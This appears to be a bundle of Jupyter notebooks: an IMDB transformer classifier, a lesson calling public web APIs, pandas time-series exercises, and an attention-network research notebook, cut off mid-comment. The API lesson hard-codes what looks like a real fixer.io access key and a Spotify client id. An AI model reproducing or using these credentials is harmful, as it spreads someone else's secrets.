from torchtext import data, datasets, vocab
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.tensorboard import SummaryWriter
import random, tqdm, sys, math, gzip, os
from utils.util import d, save_checkpoint, load_checkpoint
from transformers import CTransformer
# + id="1mkXj0VJu3Ts"
def trainF(model, train_loader, val_loader, num_epochs, criterion, save_name):
    """Train `model`, validate each epoch, and checkpoint on best validation loss.

    Returns (train_losses, val_losses): per-epoch average losses.

    NOTE(review): relies on the notebook globals `device`, `mx` (max sequence
    length), `optimizer` and `scheduler`; `input` shadows the builtin.
    Labels are shifted by -1 (torchtext LABEL vocab starts at 1).
    """
    gradient_clipping = 1.0
    best_val_loss = float("Inf")
    train_losses = []
    val_losses = []
    for epoch in range(num_epochs):
        running_loss = 0.0
        model.train()
        print('Starting epoch ' + str(epoch + 1))
        for batch in tqdm.tqdm(train_loader):
            input = batch.text[0].to(device)
            label = batch.label - 1
            label = label.to(device)
            # truncate sequences longer than the model's max length
            if input.size(1) > mx:
                input = input[:, :mx]
            out = model(input)
            loss = criterion(out, label)
            # Backward and optimize
            optimizer.zero_grad()
            loss.backward()
            #clip gradients
            if gradient_clipping > 0.0:
                nn.utils.clip_grad_norm_(model.parameters(), gradient_clipping)
            optimizer.step()
            scheduler.step()
            running_loss += loss.item()
        avg_train_loss = running_loss / len(train_loader)
        train_losses.append(avg_train_loss)
        # validation pass: loss and accuracy, no gradients
        val_running_loss = 0.0
        with torch.no_grad():
            model.eval()
            tot, cor = 0.0, 0.0
            for batch in val_loader:
                input = batch.text[0].to(device)
                label = batch.label - 1
                label = label.to(device)
                if input.size(1) > mx:
                    input = input[:, :mx]
                out = model(input)
                loss = criterion(out, label)
                val_running_loss += loss.item()
                tot += float(input.size(0))
                cor += float((label == out.argmax(dim=1)).sum().item())
            acc = cor/tot
            print("validation accuracy {:.3f}".format(acc))
        avg_val_loss = val_running_loss / len(val_loader)
        val_losses.append(avg_val_loss)
        print('Epoch [{}/{}],Train Loss: {:.4f}, Valid Loss: {:.8f}'
              .format(epoch+1, num_epochs, avg_train_loss, avg_val_loss))
        # keep the checkpoint with the lowest validation loss
        if avg_val_loss < best_val_loss:
            best_val_loss = avg_val_loss
            save_checkpoint(save_name, model, optimizer, best_val_loss)
    print("Finished Training")
    return train_losses, val_losses
# + id="emkAqGP3aqiD"
# evaluation metrics
def eval(model, test_loader):
    """Print accuracy of `model` over `test_loader`.

    NOTE(review): shadows the builtin `eval` (kept because it is called by
    this name below); uses notebook globals `device` and `mx`. The per-item
    `label == out.argmax(dim=1)` comparison assumes batch_size == 1.
    """
    with torch.no_grad():
        model.eval()
        correct = 0
        print('Starting Iteration')
        count = 0
        for batch in test_loader:
            input = batch.text[0].to(device)
            label = batch.label - 1
            label = label.to(device)
            # truncate sequences longer than the model's max length
            if input.size(1) > mx:
                input = input[:, :mx]
            out = model(input)
            if label == out.argmax(dim=1):
                correct += 1
            count += 1
            print("Current Count is: {}".format(count))
        print('Accuracy on test set: {}'.format(correct/count))
# + id="nqKZW8XLvfil"
vocab_size = 50000
batch_size = 4
LOG2E = math.log2(math.e)
# torchtext fields: lowercased tokenized review text (with lengths,
# batch-first) and a non-sequential sentiment label
TEXT = data.Field(lower=True, include_lengths=True, batch_first=True)
LABEL = data.Field(sequential=False)
# + id="w1teRHsCvldI" outputId="3f62b9be-6d90-4723-ff6e-da9ad6e71699" colab={"base_uri": "https://localhost:8080/", "height": 52}
# IMDB sentiment dataset; 80/20 train/validation split
tdata, test = datasets.IMDB.splits(TEXT, LABEL, root='/content/drive/My Drive/Colab Notebooks/Transformers/.data/')
train, val = tdata.split(split_ratio=0.8)
TEXT.build_vocab(train, max_size=vocab_size - 2)  # 2 slots reserved for specials
LABEL.build_vocab(train)
# + id="g-6MFaBB-i43"
train_iter = data.BucketIterator(train, batch_size=batch_size, device=d())
val_iter = data.BucketIterator(val, batch_size=1, device=d())
test_iter = data.BucketIterator(test, batch_size=1, device=d())
# train_loader = torch.utils.data.DataLoader(train, batch_size=batch_size, num_workers=10)
# val_loader = torch.utils.data.DataLoader(val, batch_size=1, num_workers=0, shuffle=True)
# test_loader = torch.utils.data.DataLoader(test, batch_size=1, num_workers=0, shuffle=True)
# + id="2dXfGk60wQFI" outputId="4b83ae54-080d-4cc8-bb6c-64da6a3b3d5c" colab={"base_uri": "https://localhost:8080/", "height": 69}
# NOTE(review): len(BucketIterator) counts batches, not examples
print(f'- nr. of training examples {len(train_iter)}')
print(f'- nr. of validation examples {len(val_iter)}')
print(f'- nr. of test examples {len(test_iter)}')
# + id="0KSfaIHpzC-a" outputId="df6bc5d1-98fe-4da3-87a1-70ff3790ad01" colab={"base_uri": "https://localhost:8080/", "height": 1000}
# Transformer-classifier hyperparameters
NUM_CLS = 2
embedding_size = 128
num_heads = 8
depth = 6
max_length = 512
max_pool = True
# mx: maximum sequence length fed to the model
if max_length < 0:
    # NOTE(review): dead branch while max_length=512; also shadows the
    # builtin `input` in the comprehension.
    mx = max([input.text[0].size(1) for input in train_iter])
    mx = mx * 2
    print(f'- maximum sequence length: {mx}')
else:
    mx = max_length
    print(f'- maximum sequence length: {mx}')
#creating the original network and couting the parameters of different networks
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
model = CTransformer(emb=embedding_size, heads=num_heads, depth=depth, seq_length=mx, num_tokens=vocab_size, num_classes=NUM_CLS, max_pool=max_pool)
if torch.cuda.is_available():
    model.cuda()
temp = sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f'The model architecture:\n\n', model)
print(f'\nThe model has {temp:,} trainable parameters')
# + id="oCtZ-cm4zQhT"
# start training
optimizer = torch.optim.Adam(lr = 0.0001, params=model.parameters())
# linear LR warmup over the first 10000/batch_size optimizer steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lambda i: min(i / (10000/batch_size), 1.0))
num_epochs = 10
# NOTE(review): NLLLoss expects log-probabilities -- assumes CTransformer
# ends in log_softmax; confirm in the project module.
criterion = nn.NLLLoss()
save_path = 'CTransformersNet.pt'
# train_losses, val_losses = trainF(model, train_iter, val_iter, num_epochs, criterion, save_path)
# + id="Jf0OQqFGzVNJ" outputId="e59eab81-5171-415d-96d5-84f970a9a2ca" colab={"base_uri": "https://localhost:8080/", "height": 104}
# Evaluation on previously saved models
load_model = CTransformer(emb=embedding_size, heads=num_heads, depth=depth, seq_length=mx, num_tokens=vocab_size, num_classes=NUM_CLS, max_pool=max_pool)
load_model = load_model.to(device)
load_optimizer = torch.optim.Adam(load_model.parameters(),lr = 0.0001)
save_path = 'CTransformersNet.pt'
best_val_loss = load_checkpoint(load_model, save_path, load_optimizer)
print(best_val_loss)
eval(load_model, test_iter)
# + id="MpTxSjqrzZG4" outputId="86865754-3ac7-42b0-92bc-26f2bb18a036" colab={"base_uri": "https://localhost:8080/", "height": 279}
#plotting of training and validation loss
# NOTE(review): train_losses/val_losses only exist if the trainF call above
# is uncommented; as written this cell raises NameError.
plt.xlabel('epoch')
plt.ylabel('loss')
plt.plot(train_losses, label='Train Loss')
plt.plot(val_losses, label="Validation Loss")
plt.legend(bbox_to_anchor=(1.05, 1.0), loc='upper left')
plt.savefig('lossclassifier.png')
plt.show()
# + [markdown] id="ZYoTVv5wGscH"
# Prediction
# + id="POSsAFdJRK6Q" outputId="f4bafe93-9e1b-4404-bf11-c5f4a8b4fd13" colab={"base_uri": "https://localhost:8080/", "height": 35}
print(TEXT.vocab.itos[:10])
# + id="T9p-hsDudXYn" outputId="65ea2ce7-cb2e-4148-de98-a93c2ce6ed6f" colab={"base_uri": "https://localhost:8080/", "height": 55}
# Tokenize a free-form review with spaCy for a single-example prediction.
import spacy
from spacy.tokenizer import Tokenizer
nlp = spacy.load("en_core_web_sm")
tokenizer = Tokenizer(nlp.vocab)
x = "If you're going to watch this movie, avoid any spoilers, even spoiler free reviews. Which is why I'm not going to say anything about the movie. Not even my opinion. All I'm going to say is: The crowd applauded 3 times during the movie, and stood up to clap their hands after. This I have never witnessed in a Dutch cinema. Dutch crowds aren't usually passionate about this. I checked the row where I was sitting, and people were crying. After the movie, I was seeing people with smudged mascara. That's all I have to say about the movie."
list_of_strings = [tok.text for tok in tokenizer(x)]
print(list_of_strings)
# + id="z64F14Db-Mj1" outputId="6c5c4b63-0ae9-47d1-ac29-90094edb015e" colab={"base_uri": "https://localhost:8080/", "height": 35}
# numericalize tokens with the training vocabulary
context = [TEXT.vocab.stoi[c] for c in list_of_strings]
context = np.asarray(context)
context = torch.from_numpy(context)
# + id="o9--tVeejxCu" outputId="b18b9cbf-d1b7-4a5a-8fb0-c7f48ff0eee3" colab={"base_uri": "https://localhost:8080/", "height": 104}
with torch.no_grad():
    model.eval()
    x = context.view(1, -1)
    input = x.to(device)
    print(input.shape)
    out = model(input)
    print (out)
    label = out.argmax(dim=1)
    print (label)
    # labels were shifted by -1 during training; shift back for vocab lookup
    label += 1
    print (label)
    print(LABEL.vocab.itos[label])
|
notebooks/classifier.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # More API Examples
#
# This notebook contains EVEN MORE API examples so you can get an idea of the types of services available. There's a world of API's out there for the taking, and we cannot teach them all to you. We can only teach you how they work in general... the details are 100% up to you!
#
#
#
# ### You should get your own API keys as appropriate. No guarantees my keys will work for you
# # Caller Id/ Get a location for a Phone number
#
# This uses the cosmin phone number lookup API as found on https://market.mashape.com/explore
#
# This api requires `headers` to be passed into the `get()` request. The API key and the requested output of `json` are sent into the header.
#
# Enter a phone number as input like `3154432911` and then the API will output JSON data consisting of caller ID data and GPS coordinates.
# +
import requests
# Look up caller-ID / location info for a phone number via the Mashape
# (now RapidAPI) "cosmin" phone-lookup service; the API key and the
# desired JSON response type are passed as request headers.
phone = input("Enter your phone number: ")
params = { 'phone' : phone }
headers={ "X-Mashape-Key": "<KEY>",
          "Accept": "application/json" }
response = requests.get("https://cosmin-us-phone-number-lookup.p.mashape.com/get.php", params=params, headers=headers )
phone_data = response.json()
phone_data
# -
# # Get current exchange rates
#
# This example uses http://fixer.io to get the current currency exchange rates.
#
import requests

# Fetch the latest currency exchange rates from the fixer.io API.
apikey = '159f1a48ad7a3d6f4dbe5d5a71c2135c' # get your own at fixer.io
params = {'access_key': apikey}
response = requests.get("http://data.fixer.io/api/latest", params=params)
rates = response.json()
rates
# # GeoIP lookup: Find the lat/lng of an IP Address
#
# Every computer on the internet has a unique IP Address. This service when given an IP address will return back where that IP Address is located. Pretty handy API which is commonly used with mobile devices to determine approximate location when the GPS is turned off.
import requests
# Geolocate an IP address. NOTE(review): 192.168.x.x is a private LAN
# address, so the service cannot return a meaningful public location.
ip = "192.168.3.11"
apikey = '<KEY>' # get your own at ipstack.com
# NOTE(review): the key comment says ipstack but the URL below hits
# api.snoopi.io — confirm which service this key actually belongs to.
params = { 'access_key': apikey }
url = f"http://api.snoopi.io/{ip}"
response = requests.get( url, params=params )
rates = response.json()  # location payload (variable name is a copy-paste leftover)
rates
# ## An API for sentiment analysis...
#
# Process some text and more here: http://text-processing.com
#
# sentiment
# POST the user's text to text-processing.com and print the returned
# sentiment JSON (probabilities for pos/neg/neutral).
message = input("How are you feeling today? ")
url = 'http://text-processing.com/api/sentiment/'
options = {'text': message}
response = requests.post(url, data=options)
sentiment = response.json()
print(sentiment)
# ## Searching iTunes
#
# Here's an example of the iTunes search API. I'm searching for "Mandatory fun" and printing out the track names.
# Search the iTunes catalogue for "Mandatory Fun" and print each track name.
term = 'Mandatory Fun'
params = {'term': term}
response = requests.get('https://itunes.apple.com/search', params=params)
search = response.json()
for track in search['results']:
    print(track['trackName'])
# # Earthquakes anyone?
#
# Here's an example of the significant earthquakes from the past week. Information on this API can be found here:
#
# http://earthquake.usgs.gov/earthquakes/feed/v1.0/geojson.php
#
# Retrieve this week's significant earthquakes (USGS GeoJSON feed) and
# print the human-readable title of each event.
feed_url = 'https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/significant_week.geojson'
response = requests.get(feed_url)
quakes = response.json()
for feature in quakes['features']:
    print(feature['properties']['title'])
# # Spotify
#
# The spotify example shows you how to call an API which uses the OAuth2 protocol. **This is a two step process.** In the first request you obtain a token, and in the second request you call the API with that token. Twitter, Facebook, Google, and many other services use this approach.
#
# Typically you will use the **client credentials flow**, which does not explicitly require the user to consent.
# https://developer.spotify.com/documentation/general/guides/authorization-guide/
#
# API's that use this approach will issue you a client id and a client secret. The id is always the same but the secret may be changed.
#
# We use that client id and client secret to get an bearer access token. Notice how we pass into the post a named argument `auth=` which authenticates with the client id/secret.
#
# Next we use the bearer access token to make subsequent calls to the api.
#
# +
from base64 import b64encode
# USE YOUR OWN CREDENTIALS THESE ARE EXAMPLES
client_id = "413fe60240a7ad1881bcca301a345"
client_secret = "<KEY>"
# Step one, get the access token
# OAuth2 client-credentials flow: POST the id/secret via HTTP basic auth
# and receive a short-lived bearer token in the JSON response.
payload = { 'grant_type' : 'client_credentials'}
response = requests.post("https://accounts.spotify.com/api/token", auth=(client_id,client_secret),data=payload)
token = response.json()['access_token']
print(f"Access token: {token}")
# Step two and beyond, use the access token to call the api
# Every subsequent request carries the token in an Authorization header.
url = "https://api.spotify.com/v1/tracks/<KEY>"
header = {"Authorization" : f"Bearer {token}"}
response = requests.get(url, headers=header)
response.json()
|
lessons/11-webapis/WMC3-More-API-Examples.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
import matplotlib.pyplot as plt
# NOTE(review): the plain 'seaborn' style name is deprecated in newer
# matplotlib releases (use 'seaborn-v0_8' there).
plt.style.use('seaborn')
# %matplotlib inline
# Sales records indexed by timestamp so we can slice by date strings.
sales = pd.read_csv('data/sales-feb-2015.csv', index_col='Date', parse_dates=True)
sales.head()
sales.info()
# Exact-timestamp lookup of a single cell.
sales.loc['2015-02-04 21:52:45', 'Company']
# Partial-string indexing: a whole day, a whole month, a date range.
sales.loc['2015-2-5']
sales.loc['2015-2']
sales.loc['2015-2-16':'2015-2-20']
# Downsample to daily means (days without sales become NaN).
daily_mean = sales.resample('D').mean()
daily_mean
print(daily_mean.loc['2015-2-2'])
print(sales.loc['2015-2-2', 'Units'])
sales.loc['2015-2-2', 'Units'].mean()
sales.resample('D').sum().max()
sales.resample('W').count()
# Input Description
#
# - ‘min’, ‘ T’ minute
# - ‘H’ hour
# - ‘D’ day
# - ‘B’ business day
# - ‘W’ week
# - ‘M’ month
# - ‘Q’ quarter
# - ‘A’ year
# Two-weekly totals of a single column.
sales.loc[:,'Units'].resample('2W').sum()
two_days = sales.loc['2015-2-4': '2015-2-5', 'Units']
two_days
# # Manipulate String
# Vectorised string methods via the .str accessor.
sales['Company'].str.upper()
sales['Product'].str.contains('ware')
sales['Product'].str.contains('ware').sum()  # True counts as 1
sp500 = pd.read_csv('data/sp500.csv', parse_dates=True, index_col= 'Date')
sp500.head()
sp500['Close'].plot()
sp500['Close'].plot(title='S&P 500')
plt.ylabel('Closing Price (US Dollars)')
sp500.loc['2015-4-1':'2015-5-1', 'Close'].plot(title='S&P 500')
plt.ylabel('Closing Price (US Dollars)')
# style 'k.-': black colour, dot marker, solid line (legend below).
sp500.loc['2015-4-1':'2015-5-1', 'Close'].plot(style='k.-', title='S&P 500')
plt.ylabel('Closing Price (US Dollars)')
# - color = k: black, - b: blue , g: green, - r: red , c: cyan
# - marker = . : dot, o: circle, *: star, s: square, +: plus
# - Line type = -: solid, .: dotted, –: dashed
#
sp500['Close'].plot(title='S&P 500', kind = 'area')
plt.ylabel('Closing Price (US Dollars)')
sp500.loc['2015', ['Close', 'Volume']].plot(title='S&P 500', subplots=True)
|
Bagian 4 - Fundamental Pandas/3. Indexing Time Series.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="VAYu3ISwwGks"
import numpy as np
import pandas as pd
import torch
import torchvision
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from matplotlib import pyplot as plt
# %matplotlib inline
from scipy.stats import entropy
# + id="l7cwckMRQnX1" colab={"base_uri": "https://localhost:8080/"} outputId="0cc860ef-a4ea-4aa2-85b6-661f2043230e"
from google.colab import drive
drive.mount('/content/drive')
# + id="gT3NftTEQnP8"
path="/content/drive/MyDrive/Research/alpha_analysis/"
# + id="ueNIyXZNQqht"
name="_50_50_10runs_entropy"
# + id="TjEp-LtqiWAf"
# mu1 = np.array([3,3,3,3,0])
# sigma1 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu2 = np.array([4,4,4,4,0])
# sigma2 = np.array([[16,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu3 = np.array([10,5,5,10,0])
# sigma3 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu4 = np.array([-10,-10,-10,-10,0])
# sigma4 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu5 = np.array([-21,4,4,-21,0])
# sigma5 = np.array([[16,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu6 = np.array([-10,18,18,-10,0])
# sigma6 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu7 = np.array([4,20,4,20,0])
# sigma7 = np.array([[16,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu8 = np.array([4,-20,-20,4,0])
# sigma8 = np.array([[16,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu9 = np.array([20,20,20,20,0])
# sigma9 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu10 = np.array([20,-10,-10,20,0])
# sigma10 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# sample1 = np.random.multivariate_normal(mean=mu1,cov= sigma1,size=500)
# sample2 = np.random.multivariate_normal(mean=mu2,cov= sigma2,size=500)
# sample3 = np.random.multivariate_normal(mean=mu3,cov= sigma3,size=500)
# sample4 = np.random.multivariate_normal(mean=mu4,cov= sigma4,size=500)
# sample5 = np.random.multivariate_normal(mean=mu5,cov= sigma5,size=500)
# sample6 = np.random.multivariate_normal(mean=mu6,cov= sigma6,size=500)
# sample7 = np.random.multivariate_normal(mean=mu7,cov= sigma7,size=500)
# sample8 = np.random.multivariate_normal(mean=mu8,cov= sigma8,size=500)
# sample9 = np.random.multivariate_normal(mean=mu9,cov= sigma9,size=500)
# sample10 = np.random.multivariate_normal(mean=mu10,cov= sigma10,size=500)
# + id="5YDnxeP-2_1V"
# X = np.concatenate((sample1,sample2,sample3,sample4,sample5,sample6,sample7,sample8,sample9,sample10),axis=0)
# Y = np.concatenate((np.zeros((500,1)),np.ones((500,1)),2*np.ones((500,1)),3*np.ones((500,1)),4*np.ones((500,1)),
# 5*np.ones((500,1)),6*np.ones((500,1)),7*np.ones((500,1)),8*np.ones((500,1)),9*np.ones((500,1))),axis=0).astype(int)
# print(X.shape,Y.shape)
# # plt.scatter(sample1[:,0],sample1[:,1],label="class_0")
# # plt.scatter(sample2[:,0],sample2[:,1],label="class_1")
# # plt.scatter(sample3[:,0],sample3[:,1],label="class_2")
# # plt.scatter(sample4[:,0],sample4[:,1],label="class_3")
# # plt.scatter(sample5[:,0],sample5[:,1],label="class_4")
# # plt.scatter(sample6[:,0],sample6[:,1],label="class_5")
# # plt.scatter(sample7[:,0],sample7[:,1],label="class_6")
# # plt.scatter(sample8[:,0],sample8[:,1],label="class_7")
# # plt.scatter(sample9[:,0],sample9[:,1],label="class_8")
# # plt.scatter(sample10[:,0],sample10[:,1],label="class_9")
# # plt.legend(bbox_to_anchor=(1.05, 1), loc='upper left')
# + id="k6YzqPUf3CHa"
# class SyntheticDataset(Dataset):
# """MosaicDataset dataset."""
# def __init__(self, x, y):
# """
# Args:
# csv_file (string): Path to the csv file with annotations.
# root_dir (string): Directory with all the images.
# transform (callable, optional): Optional transform to be applied
# on a sample.
# """
# self.x = x
# self.y = y
# #self.fore_idx = fore_idx
# def __len__(self):
# return len(self.y)
# def __getitem__(self, idx):
# return self.x[idx] , self.y[idx] #, self.fore_idx[idx]
# + id="4Mi3nL5-4D7_"
# trainset = SyntheticDataset(X,Y)
# # testset = torchvision.datasets.MNIST(root='./data', train=False, download=True, transform=transform)
# + id="HKzc7IgwqoU2"
# classes = ('zero','one','two','three','four','five','six','seven','eight','nine')
# foreground_classes = {'zero','one','two'}
# fg_used = '012'
# fg1, fg2, fg3 = 0,1,2
# all_classes = {'zero','one','two','three','four','five','six','seven','eight','nine'}
# background_classes = all_classes - foreground_classes
# background_classes
# + id="eT6iKHutquR8"
# trainloader = torch.utils.data.DataLoader(trainset, batch_size=100, shuffle=True)
# + id="IWKzXkPSq5KU"
# dataiter = iter(trainloader)
# background_data=[]
# background_label=[]
# foreground_data=[]
# foreground_label=[]
# batch_size=100
# for i in range(50):
# images, labels = dataiter.next()
# for j in range(batch_size):
# if(classes[labels[j]] in background_classes):
# img = images[j].tolist()
# background_data.append(img)
# background_label.append(labels[j])
# else:
# img = images[j].tolist()
# foreground_data.append(img)
# foreground_label.append(labels[j])
# foreground_data = torch.tensor(foreground_data)
# foreground_label = torch.tensor(foreground_label)
# background_data = torch.tensor(background_data)
# background_label = torch.tensor(background_label)
# + id="ChdziOP3rF1G"
# def create_mosaic_img(bg_idx,fg_idx,fg):
# """
# bg_idx : list of indexes of background_data[] to be used as background images in mosaic
# fg_idx : index of image to be used as foreground image from foreground data
# fg : at what position/index foreground image has to be stored out of 0-8
# """
# image_list=[]
# j=0
# for i in range(9):
# if i != fg:
# image_list.append(background_data[bg_idx[j]])
# j+=1
# else:
# image_list.append(foreground_data[fg_idx])
# label = foreground_label[fg_idx] - fg1 # minus fg1 because our fore ground classes are fg1,fg2,fg3 but we have to store it as 0,1,2
# #image_list = np.concatenate(image_list ,axis=0)
# image_list = torch.stack(image_list)
# return image_list,label
# + id="0ASrmPqErIDM"
# desired_num = 3000
# mosaic_list_of_images =[] # list of mosaic images, each mosaic image is saved as list of 9 images
# fore_idx =[] # list of indexes at which foreground image is present in a mosaic image i.e from 0 to 9
# mosaic_label=[] # label of mosaic image = foreground class present in that mosaic
# list_set_labels = []
# for i in range(desired_num):
# set_idx = set()
# np.random.seed(i)
# bg_idx = np.random.randint(0,3500,8)
# set_idx = set(background_label[bg_idx].tolist())
# fg_idx = np.random.randint(0,1500)
# set_idx.add(foreground_label[fg_idx].item())
# fg = np.random.randint(0,9)
# fore_idx.append(fg)
# image_list,label = create_mosaic_img(bg_idx,fg_idx,fg)
# mosaic_list_of_images.append(image_list)
# mosaic_label.append(label)
# list_set_labels.append(set_idx)
# + id="SDFN7dCarmmR"
# def create_avg_image_from_mosaic_dataset(mosaic_dataset,labels,foreground_index,dataset_number):
# """
# mosaic_dataset : mosaic_dataset contains 9 images 32 x 32 each as 1 data point
# labels : mosaic_dataset labels
# foreground_index : contains list of indexes where foreground image is present so that using this we can take weighted average
# dataset_number : will help us to tell what ratio of foreground image to be taken. for eg: if it is "j" then fg_image_ratio = j/9 , bg_image_ratio = (9-j)/8*9
# """
# avg_image_dataset = []
# for i in range(len(mosaic_dataset)):
# img = torch.zeros([5], dtype=torch.float64)
# for j in range(9):
# if j == foreground_index[i]:
# img = img + mosaic_dataset[i][j]*dataset_number/9
# else :
# img = img + mosaic_dataset[i][j]*(9-dataset_number)/(8*9)
# avg_image_dataset.append(img)
# return torch.stack(avg_image_dataset) , torch.stack(labels) , foreground_index
# + id="whGsdvMSzIUK"
class MosaicDataset1(Dataset):
    """Torch dataset wrapping pre-built mosaic images.

    Each item is a (mosaic, label, foreground_index) triple, where
    foreground_index records which of the tiles holds the foreground
    image of the mosaic.
    """

    def __init__(self, mosaic_list, mosaic_label, fore_idx):
        """Store the parallel sequences of mosaics, labels and positions."""
        self.mosaic = mosaic_list
        self.label = mosaic_label
        self.fore_idx = fore_idx

    def __len__(self):
        """One sample per label."""
        return len(self.label)

    def __getitem__(self, idx):
        """Return the idx-th (mosaic, label, foreground position) triple."""
        return self.mosaic[idx], self.label[idx], self.fore_idx[idx]
# + id="5gtR669R1dAF"
# data = [{"mosaic_list":mosaic_list_of_images, "mosaic_label": mosaic_label, "fore_idx":fore_idx}]
# np.save("mosaic_data.npy",data)
# + id="xM-j3o9j1eEU"
data = np.load(path+"mosaic_data.npy",allow_pickle=True)
# + id="pwz1-dL33rcg"
mosaic_list_of_images = data[0]["mosaic_list"]
mosaic_label = data[0]["mosaic_label"]
fore_idx = data[0]["fore_idx"]
# + id="fP5NPRPmb904"
batch = 250
msd = MosaicDataset1(mosaic_list_of_images, mosaic_label, fore_idx)
train_loader = DataLoader( msd,batch_size= batch ,shuffle=True)
# + [markdown] id="ilzPfrih82Bg"
# **Focus Net**
# + id="KzN3Bbs8c0fA"
class Focus_deep(nn.Module):
    """Deep focus (attention) network, averaged at the zeroth layer.

    Scores each of the K elemental inputs with a small two-layer MLP,
    softmaxes the scores into attention weights (alphas), and returns the
    alpha-weighted average of the inputs together with the alphas and
    their log-softmax (used for the entropy regulariser).
    """

    def __init__(self, inputs, output, K, d):
        """
        inputs : dimensionality of each elemental data point
        output : score dimension per element (only column 0 is used)
        K      : number of elements per mosaic
        d      : dimensionality of the averaged output
        """
        super(Focus_deep, self).__init__()
        self.inputs = inputs
        self.output = output
        self.K = K
        self.d = d
        self.linear1 = nn.Linear(self.inputs, 50)
        self.linear2 = nn.Linear(50, self.output)

    def forward(self, z):
        """Return (weighted average y, alphas, log-alphas) for z of shape (batch, K, d)."""
        batch = z.shape[0]
        x = torch.zeros([batch, self.K], dtype=torch.float64)
        y = torch.zeros([batch, self.d], dtype=torch.float64)
        # NOTE(review): device is hard-coded; this fails on CPU-only machines.
        x, y = x.to("cuda"), y.to("cuda")
        for i in range(self.K):
            # one scalar focus score per element (column 0 of the helper output)
            x[:, i] = self.helper(z[:, i])[:, 0]
        log_x = F.log_softmax(x, dim=1)  # log-alphas, for the entropy term
        x = F.softmax(x, dim=1)          # alphas
        # BUG FIX: removed a dead `x1 = x[:, 0]` pre-assignment that was
        # immediately overwritten inside the loop below.
        for i in range(self.K):
            # accumulate the attention-weighted average of the elements
            y = y + torch.mul(x[:, i][:, None], z[:, i])
        return y, x, log_x

    def helper(self, x):
        """Two-layer MLP producing per-element focus scores."""
        x = F.relu(self.linear1(x))
        x = self.linear2(x)
        return x
# + [markdown] id="EjrL0Zb484KO"
# **Classification Net**
# + id="w0W0oKcClFZY"
class Classification_deep(nn.Module):
    """Two-layer MLP classifier applied to the attention-averaged data point."""

    def __init__(self, inputs, output):
        """inputs: dimension of the averaged data; output: number of classes."""
        super(Classification_deep, self).__init__()
        self.inputs = inputs
        self.output = output
        self.linear1 = nn.Linear(self.inputs, 50)
        self.linear2 = nn.Linear(50, self.output)

    def forward(self, x):
        """Return raw class logits for the input batch x."""
        hidden = F.relu(self.linear1(x))
        return self.linear2(hidden)
# + id="6fBtRWYgTDtY"
# Shared cross-entropy criterion for the classification logits.
criterion = nn.CrossEntropyLoss()


def my_cross_entropy(x, y, alpha, log_alpha, k):
    """Combined loss: (1 - k) * cross-entropy + k * mean attention entropy.

    Returns (combined loss, plain cross-entropy term, mean entropy of the
    attention weights alpha).
    """
    closs = criterion(x, y)
    # mean over the batch of sum_i(-alpha_i * log alpha_i)
    entropy = torch.mean(torch.sum(-1.0 * alpha * log_alpha, dim=1))
    loss = (1 - k) * closs + k * entropy
    return loss, closs, entropy
# + [markdown] id="4Fd1_nXkyLhE"
#
# + id="ehAfQnNwgFYX"
def calculate_attn_loss(dataloader, what, where, criter, k):
    """Evaluate the focus ("where") and classification ("what") networks.

    Runs one no-grad pass over `dataloader` and returns the average
    combined loss, average cross-entropy, average attention entropy, and
    the FTPT/FFPT analysis of the predictions.

    Note: `criter` is accepted for interface compatibility but the loss
    is computed by `my_cross_entropy` (which uses the module criterion).
    """
    what.eval()
    where.eval()
    r_loss = 0
    cc_loss = 0
    cc_entropy = 0
    alphas = []
    lbls = []
    pred = []
    fidices = []
    n_batches = 0
    with torch.no_grad():
        for i, data in enumerate(dataloader, 0):
            inputs, labels, fidx = data
            lbls.append(labels)
            fidices.append(fidx)
            inputs = inputs.double()
            inputs, labels = inputs.to("cuda"), labels.to("cuda")
            avg, alpha, log_alpha = where(inputs)
            outputs = what(avg)
            _, predicted = torch.max(outputs.data, 1)
            pred.append(predicted.cpu().numpy())
            alphas.append(alpha.cpu().numpy())
            loss, closs, entropy = my_cross_entropy(outputs, labels, alpha, log_alpha, k)
            r_loss += loss.item()
            cc_loss += closs.item()
            cc_entropy += entropy.item()
            n_batches += 1
    alphas = np.concatenate(alphas, axis=0)
    pred = np.concatenate(pred, axis=0)
    lbls = np.concatenate(lbls, axis=0)
    fidices = np.concatenate(fidices, axis=0)
    analysis = analyse_data(alphas, lbls, pred, fidices)
    # BUG FIX: the original divided the accumulated sums by the last
